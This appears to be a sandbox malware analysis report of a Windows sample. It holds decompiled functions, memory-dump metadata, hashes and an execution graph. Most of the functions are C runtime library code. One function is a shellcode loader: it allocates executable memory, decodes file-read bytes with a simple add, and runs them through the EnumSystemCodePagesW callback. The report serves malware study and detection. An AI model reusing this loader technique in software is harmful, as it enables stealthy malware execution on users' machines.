											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E00D72873(_t119));
											_t88 = E00D72A2A();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00D72897(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00D71CC3())) = 0x16;
				goto L4;
			}




























                        0x00d712ba
                        0x00d712bd
                        0x00d712c3
                        0x00d712c6
                        0x00d712c9
                        0x00d712e6
                        0x00000000
                        0x00d712e6
                        0x00d712cb
                        0x00d712d0
                        0x00000000
                        0x00000000
                        0x00d712d4
                        0x00d712ef
                        0x00d712f2
                        0x00d712f4
                        0x00d71302
                        0x00d71302
                        0x00d71306
                        0x00d7130e
                        0x00d71313
                        0x00d71313
                        0x00d71316
                        0x00d71318
                        0x00000000
                        0x00d7131a
                        0x00d7131a
                        0x00d71322
                        0x00d71324
                        0x00000000
                        0x00000000
                        0x00d71326
                        0x00d71329
                        0x00d7132c
                        0x00d71333
                        0x00d71335
                        0x00d7133c
                        0x00d71337
                        0x00d71337
                        0x00d71337
                        0x00d71341
                        0x00d71344
                        0x00d71346
                        0x00d7142f
                        0x00000000
                        0x00d7134c
                        0x00d7134c
                        0x00d7134c
                        0x00d71353
                        0x00d71394
                        0x00d71394
                        0x00d71396
                        0x00d71401
                        0x00d71407
                        0x00d7140a
                        0x00d71461
                        0x00000000
                        0x00d71467
                        0x00d7140c
                        0x00d7140f
                        0x00d71411
                        0x00d71437
                        0x00d71437
                        0x00d7143b
                        0x00d71445
                        0x00d7144a
                        0x00d71452
                        0x00d712e1
                        0x00d712e1
                        0x00000000
                        0x00d712e1
                        0x00d71413
                        0x00d71416
                        0x00d71419
                        0x00d7141a
                        0x00d7141d
                        0x00d7141d
                        0x00d7141e
                        0x00d71421
                        0x00d71424
                        0x00000000
                        0x00d71424
                        0x00d71398
                        0x00d7139a
                        0x00d713be
                        0x00d713c3
                        0x00d713c9
                        0x00d713cb
                        0x00d713cb
                        0x00d7139c
                        0x00d7139e
                        0x00d713a4
                        0x00d713b6
                        0x00d713b6
                        0x00d713b6
                        0x00d713b8
                        0x00d713a6
                        0x00d713ab
                        0x00d713ad
                        0x00d713ad
                        0x00d713ba
                        0x00d713ba
                        0x00d713cd
                        0x00d713d0
                        0x00000000
                        0x00d713d2
                        0x00d713d2
                        0x00d713d3
                        0x00d713dd
                        0x00d713de
                        0x00d713e3
                        0x00d713e6
                        0x00d713e8
                        0x00d7146f
                        0x00000000
                        0x00d7146f
                        0x00d713ee
                        0x00d713f1
                        0x00d7145d
                        0x00d7145d
                        0x00d7145d
                        0x00d7145d
                        0x00000000
                        0x00d7145d
                        0x00d713f3
                        0x00d713f3
                        0x00d713f5
                        0x00d713f5
                        0x00d713f8
                        0x00d713fb
                        0x00000000
                        0x00d713fb
                        0x00d713d0
                        0x00d71355
                        0x00d71358
                        0x00d7135b
                        0x00d7135d
                        0x00000000
                        0x00000000
                        0x00d7135f
                        0x00000000
                        0x00000000
                        0x00d71365
                        0x00d71367
                        0x00d71369
                        0x00d7136b
                        0x00d7136b
                        0x00d7136e
                        0x00d71371
                        0x00d71373
                        0x00000000
                        0x00d71379
                        0x00d71380
                        0x00d71385
                        0x00d71388
                        0x00d7138b
                        0x00d7138e
                        0x00d71390
                        0x00000000
                        0x00d71390
                        0x00d71427
                        0x00d71427
                        0x00d71427
                        0x00000000
                        0x00d7134c
                        0x00d71346
                        0x00d71318
                        0x00d712fb
                        0x00d712fe
                        0x00d71300
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d71300
                        0x00d712d6
                        0x00d712db
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction ID: 7100eee9444e1edd4926910414a3c15ba6e0780f65ec087109f216d529f89e78
                        • Opcode Fuzzy Hash: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction Fuzzy Hash: C751CE38A006059BDB248FAD88856AEB7B1AF41324F28C729F87D966D1F770DD508B74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D77452 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E00D77452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xd84834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xd84830 == _t7) {
									_t9 = E00D71CC3();
									 *_t9 = E00D71CD6(GetLastError());
									goto L17;
								} else {
									if(E00D71741(_t7, _t31) == 0) {
										_t12 = E00D71CC3();
										 *_t12 = E00D71CD6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00D71741(_t6, _t31);
						 *((intOrPtr*)(E00D71CC3())) = 0xc;
						goto L12;
					} else {
						E00D74831(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00D7113F(__ebx, __edx, __edi, _a8);
				}
			}









                        0x00d77459
                        0x00d77467
                        0x00d7746c
                        0x00d7747b
                        0x00d774ae
                        0x00d77480
                        0x00d77482
                        0x00d77482
                        0x00d7748f
                        0x00d77495
                        0x00d77499
                        0x00d774f9
                        0x00d774f9
                        0x00d7749b
                        0x00d774a1
                        0x00d774e3
                        0x00d774f7
                        0x00000000
                        0x00d774a3
                        0x00d774ac
                        0x00d774cb
                        0x00d774df
                        0x00d774c5
                        0x00d774c5
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d774ac
                        0x00d774a1
                        0x00000000
                        0x00d774c7
                        0x00d774b4
                        0x00d774bf
                        0x00000000
                        0x00d7746e
                        0x00d77471
                        0x00d77477
                        0x00d77477
                        0x00d774c8
                        0x00d774ca
                        0x00d7745b
                        0x00d77465
                        0x00d77465

                        APIs
                        • _malloc.LIBCMT ref: 00D7745E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                        • _free.LIBCMT ref: 00D77471
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AllocHeap_free_malloc
                        • String ID:
                        • API String ID: 2734353464-0
                        • Opcode ID: 2e6bcde8ddb9d40707659fd4a2eaa78ee7d69ad48a4c9393baf89f4664d54936
                        • Instruction ID: c5849b6f846d88d016a79cef9a64116457cb18d21cf60a451bec5e216a458715
                        • Opcode Fuzzy Hash: 2e6bcde8ddb9d40707659fd4a2eaa78ee7d69ad48a4c9393baf89f4664d54936
                        • Instruction Fuzzy Hash: 52117731909625ABCB213FB8AC456597FD4EF04368B24CE2AF94CDA351FA70884086B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D71000 Relevance: 7.6, APIs: 5, Instructions: 50memoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E00D71000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				void* _t14;
				_Unknown_base(*)()* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				intOrPtr* _t28;

				_push(_t14);
				_t22 = 0;
				_t6 = E00D7113F(_t14, _t20, 0, 0x17d78400);
				 *_t28 = 0xd83000;
				_v8 = _t6;
				_t7 = E00D711D1(_a12, _t21);
				_t15 = VirtualAlloc(0, 0x137a, 0x3000, 0x40);
				E00D71475(_t15, 0x137a, 1, _t7);
				_t10 = _v8;
				if(_v8 != 0) {
					E00D71530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t15 + _t22)) =  *((char*)(_t15 + _t22)) + 0xcf;
						_t22 = _t22 + 1;
					} while (_t22 < 0x137a);
					EnumSystemCodePagesW(_t15, 0);
				}
				return 0;
			}














                        0x00d71004
                        0x00d7100c
                        0x00d7100e
                        0x00d71013
                        0x00d7101d
                        0x00d71020
                        0x00d71044
                        0x00d71048
                        0x00d7104d
                        0x00d71055
                        0x00d71062
                        0x00d7106a
                        0x00d7106a
                        0x00d7106e
                        0x00d7106f
                        0x00d71076
                        0x00d71076
                        0x00d71082

                        APIs
                        • _malloc.LIBCMT ref: 00D7100E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                          • Part of subcall function 00D711D1: __wfsopen.LIBCMT ref: 00D711DC
                        • VirtualAlloc.KERNEL32(00000000,0000137A,00003000,00000040), ref: 00D71036
                        • __fread_nolock.LIBCMT ref: 00D71048
                        • _memset.LIBCMT ref: 00D71062
                        • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00D71076
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                        • String ID:
                        • API String ID: 612201108-0
                        • Opcode ID: e4038f276a8dd2edc6c7140be0fba1f327a39625a4b6c3948c5fb9ac37111e0d
                        • Instruction ID: c49b18dd87d4ba4bac98c936af6f26b7ddc41a12926152908871bb55bd3dbe6c
                        • Opcode Fuzzy Hash: e4038f276a8dd2edc6c7140be0fba1f327a39625a4b6c3948c5fb9ac37111e0d
                        • Instruction Fuzzy Hash: 730128B6A043047BE7202B799C4BF9F7F5CDB41768F104A51FA09AB1C2FAF499418274
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D791C6 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00D791C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00D74BFC( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00D7917B( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00D71CC3();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                        0x00d791ce
                        0x00d791d3
                        0x00d791ed
                        0x00000000
                        0x00d791ed
                        0x00d791d5
                        0x00d791da
                        0x00000000
                        0x00000000
                        0x00d791df
                        0x00d791fc
                        0x00d79201
                        0x00d79204
                        0x00d7920b
                        0x00d7922a
                        0x00d79231
                        0x00d79233
                        0x00d79277
                        0x00d79286
                        0x00d7928e
                        0x00d79294
                        0x00d79296
                        0x00d792a6
                        0x00d792a6
                        0x00d792aa
                        0x00d792ac
                        0x00d792af
                        0x00d792af
                        0x00d792af
                        0x00d792af
                        0x00000000
                        0x00d792b5
                        0x00d79298
                        0x00d79298
                        0x00d7929d
                        0x00d7929d
                        0x00d792a0
                        0x00000000
                        0x00d792a0
                        0x00d79235
                        0x00d79238
                        0x00d7923c
                        0x00d79265
                        0x00d79265
                        0x00d79268
                        0x00d79268
                        0x00000000
                        0x00000000
                        0x00d7926a
                        0x00d7926e
                        0x00000000
                        0x00000000
                        0x00d79270
                        0x00d79270
                        0x00000000
                        0x00d79270
                        0x00d7923e
                        0x00d79241
                        0x00000000
                        0x00000000
                        0x00d79245
                        0x00d79258
                        0x00d7925e
                        0x00d79261
                        0x00d79263
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00d79263
                        0x00d7920d
                        0x00d79210
                        0x00d79212
                        0x00d79217
                        0x00d79217
                        0x00d7921c
                        0x00000000
                        0x00d7921c
                        0x00d791e1
                        0x00d791e6
                        0x00d791ea
                        0x00d791ea
                        0x00000000

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D791FC
                        • __isleadbyte_l.LIBCMT ref: 00D7922A
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00D79258
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00D7928E
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 537aa1e05649384488e1e4de74cc8a517ee9ffb64f29953a0eee39ed2ebbe3d0
                        • Instruction ID: 06d969cad3772a35a448b74aee3fe3b575c2adef8066131253236172a2a1ea77
                        • Opcode Fuzzy Hash: 537aa1e05649384488e1e4de74cc8a517ee9ffb64f29953a0eee39ed2ebbe3d0
                        • Instruction Fuzzy Hash: 4131CF32600246BFDB219E75CC58BAABBA5FF41310F598528E868971A1F731D860DBB4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00D7A94D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00D7A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00D7AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00D7A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00D7B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00D7B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                        0x00d7a950
                        0x00d7a956
                        0x00d7a9c9
                        0x00000000
                        0x00d7a95d
                        0x00d7a95d
                        0x00d7a960
                        0x00d7a97b
                        0x00d7a97e
                        0x00d7a99e
                        0x00d7a9b0
                        0x00d7a980
                        0x00d7a980
                        0x00d7a983
                        0x00000000
                        0x00d7a985
                        0x00d7a997
                        0x00d7a997
                        0x00d7a983
                        0x00d7a9ce
                        0x00d7a9d2
                        0x00d7a962
                        0x00d7a97a
                        0x00d7a97a
                        0x00d7a960

                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction ID: df75f856d7dfbd36c160b527e5f4905a5b81d0084c358f888a7a4154378a97b9
                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                        • Instruction Fuzzy Hash: DB014E3204024EFBCF125E98CC418EE3F22BB58354B9A8515FE1D58031E336C9B1AFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:4.6%
                        Dynamic/Decrypted Code Coverage:2%
                        Signature Coverage:0%
                        Total number of Nodes:592
                        Total number of Limit Nodes:70
                        execution_graph 34472 239f07d 34475 239b990 34472->34475 34476 239b9b6 34475->34476 34483 2389d30 34476->34483 34478 239b9c2 34479 239b9e6 34478->34479 34491 2388f30 34478->34491 34529 239a670 34479->34529 34533 2389c80 34483->34533 34485 2389d3d 34486 2389d44 34485->34486 34545 2389c20 34485->34545 34486->34478 34492 2388f57 34491->34492 34963 238b1b0 34492->34963 34494 2388f69 34967 238af00 34494->34967 34496 2388f86 34502 2388f8d 34496->34502 35038 238ae30 LdrLoadDll 34496->35038 34499 2388ffc 34983 238f400 34499->34983 34501 2389006 34503 239bf50 2 API calls 34501->34503 34525 23890f2 34501->34525 34502->34525 34971 238f370 34502->34971 34504 238902a 34503->34504 34505 239bf50 2 API calls 34504->34505 34506 238903b 34505->34506 34507 239bf50 2 API calls 34506->34507 34508 238904c 34507->34508 34995 238ca80 34508->34995 34510 2389059 34511 2394a40 8 API calls 34510->34511 34512 2389066 34511->34512 34513 2394a40 8 API calls 34512->34513 34514 2389077 34513->34514 34515 2389084 34514->34515 34516 23890a5 34514->34516 35005 238d610 34515->35005 34517 2394a40 8 API calls 34516->34517 34524 23890c1 34517->34524 34520 23890e9 34522 2388d00 23 API calls 34520->34522 34522->34525 34523 2389092 35021 2388d00 34523->35021 34524->34520 35039 238d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34524->35039 34525->34479 34530 239a682 34529->34530 34531 239af20 LdrLoadDll 34530->34531 34532 239a68f 34531->34532 34564 2398b80 34533->34564 34537 2389c9c 34538 2389ca6 34537->34538 34571 239b270 34537->34571 34538->34485 34540 2389ce3 34540->34538 34582 2389aa0 34540->34582 34542 2389d03 34588 2389620 LdrLoadDll 34542->34588 34544 2389d15 34544->34485 34937 239b560 34545->34937 34548 239b560 LdrLoadDll 34549 2389c4b 34548->34549 34550 239b560 LdrLoadDll 34549->34550 34551 2389c61 34550->34551 34552 238f170 34551->34552 34553 238f189 34552->34553 34945 238b030 34553->34945 34555 238f19c 34949 239a1a0 34555->34949 34558 2389d55 34558->34478 34560 238f1c2 34561 238f1ed 34560->34561 34956 239a220 34560->34956 34563 239a450 2 API calls 34561->34563 34563->34558 34565 2398b8f 34564->34565 34589 2394e40 34565->34589 34567 2389c93 34568 2398a30 34567->34568 34595 239a5c0 34568->34595 34572 239b289 34571->34572 34602 2394a40 34572->34602 34574 239b2a1 34575 239b2aa 34574->34575 34641 239b0b0 34574->34641 34575->34540 34577 239b2be 34577->34575 34659 2399ec0 34577->34659 34915 2387ea0 34582->34915 34584 2389ac1 34584->34542 34585 2389aba 34585->34584 34928 2388160 34585->34928 34588->34544 34590 2394e5a 34589->34590 34591 2394e4e 34589->34591 34590->34567 34591->34590 34594 23952c0 LdrLoadDll 34591->34594 34593 2394fac 34593->34567 34594->34593 34596 2398a45 34595->34596 34598 239af20 34595->34598 34596->34537 34599 239af30 34598->34599 34600 239af52 34598->34600 34601 2394e40 LdrLoadDll 34599->34601 34600->34596 34601->34600 34603 2394d75 34602->34603 34604 2394a54 34602->34604 34603->34574 34604->34603 34667 2399c10 34604->34667 34607 2394b6d 34607->34574 34608 2394b80 34670 239a320 34608->34670 34609 2394b63 34727 239a420 LdrLoadDll 34609->34727 34612 2394ba7 34613 239bd80 2 API calls 34612->34613 34615 2394bb3 34613->34615 34614 2394d39 34617 239a450 2 API calls 34614->34617 34615->34607 34615->34614 34616 2394d4f 34615->34616 34621 2394c42 34615->34621 34736 2394780 LdrLoadDll NtReadFile NtClose 34616->34736 34618 2394d40 34617->34618 34618->34574 34620 2394d62 34620->34574 34622 2394ca9 34621->34622 34624 2394c51 34621->34624 34622->34614 34623 2394cbc 34622->34623 34729 239a2a0 34623->34729 34626 2394c6a 34624->34626 34627 2394c56 34624->34627 34630 2394c6f 34626->34630 34631 2394c87 34626->34631 34728 2394640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34627->34728 34673 23946e0 34630->34673 34631->34618 34685 2394400 34631->34685 34633 2394c60 34633->34574 34635 2394d1c 34733 239a450 34635->34733 34636 2394c7d 34636->34574 34639 2394c9f 34639->34574 34640 2394d28 34640->34574 34642 239b0c1 34641->34642 34643 239b0d3 34642->34643 34754 239bd00 34642->34754 34643->34577 34645 239b0f4 34757 2394060 34645->34757 34647 239b140 34647->34577 34648 239b117 34648->34647 34649 2394060 3 API calls 34648->34649 34651 239b139 34649->34651 34651->34647 34789 2395380 34651->34789 34652 239b1ca 34653 239b1da 34652->34653 34883 239aec0 LdrLoadDll 34652->34883 34799 239ad30 34653->34799 34656 239b208 34878 2399e80 34656->34878 34660 239af20 LdrLoadDll 34659->34660 34661 2399edc 34660->34661 34909 306967a 34661->34909 34662 2399ef7 34664 239bd80 34662->34664 34912 239a630 34664->34912 34666 239b319 34666->34540 34668 239af20 LdrLoadDll 34667->34668 34669 2394b34 34668->34669 34669->34607 34669->34608 34669->34609 34671 239af20 LdrLoadDll 34670->34671 34672 239a33c NtCreateFile 34671->34672 34672->34612 34674 23946fc 34673->34674 34675 239a2a0 LdrLoadDll 34674->34675 34676 239471d 34675->34676 34677 2394738 34676->34677 34678 2394724 34676->34678 34680 239a450 2 API calls 34677->34680 34679 239a450 2 API calls 34678->34679 34681 239472d 34679->34681 34682 2394741 34680->34682 34681->34636 34737 239bf90 LdrLoadDll RtlAllocateHeap 34682->34737 34684 239474c 34684->34636 34686 239444b 34685->34686 34691 239447e 34685->34691 34687 239a2a0 LdrLoadDll 34686->34687 34689 2394466 34687->34689 34688 23945c9 34690 239a2a0 LdrLoadDll 34688->34690 34692 239a450 2 API calls 34689->34692 34700 23945e4 34690->34700 34691->34688 34693 239449a 34691->34693 34694 239446f 34692->34694 34695 239a2a0 LdrLoadDll 34693->34695 34694->34639 34696 23944b5 34695->34696 34698 23944bc 34696->34698 34699 23944d1 34696->34699 34702 239a450 2 API calls 34698->34702 34703 23944ec 34699->34703 34704 23944d6 34699->34704 34750 239a2e0 LdrLoadDll 34700->34750 34701 239461e 34705 239a450 2 API calls 34701->34705 34706 23944c5 34702->34706 34713 23944f1 34703->34713 34738 239bf50 34703->34738 34707 239a450 2 API calls 34704->34707 34708 2394629 34705->34708 34706->34639 34709 23944df 34707->34709 34708->34639 34709->34639 34712 2394557 34714 239456e 34712->34714 34749 239a260 LdrLoadDll 34712->34749 34720 2394503 34713->34720 34741 239a3d0 34713->34741 34716 239458a 34714->34716 34717 2394575 34714->34717 34719 239a450 2 API calls 34716->34719 34718 239a450 2 API calls 34717->34718 34718->34720 34721 2394593 34719->34721 34720->34639 34722 23945bf 34721->34722 34744 239bb50 34721->34744 34722->34639 34724 23945aa 34725 239bd80 2 API calls 34724->34725 34726 23945b3 34725->34726 34726->34639 34727->34607 34728->34633 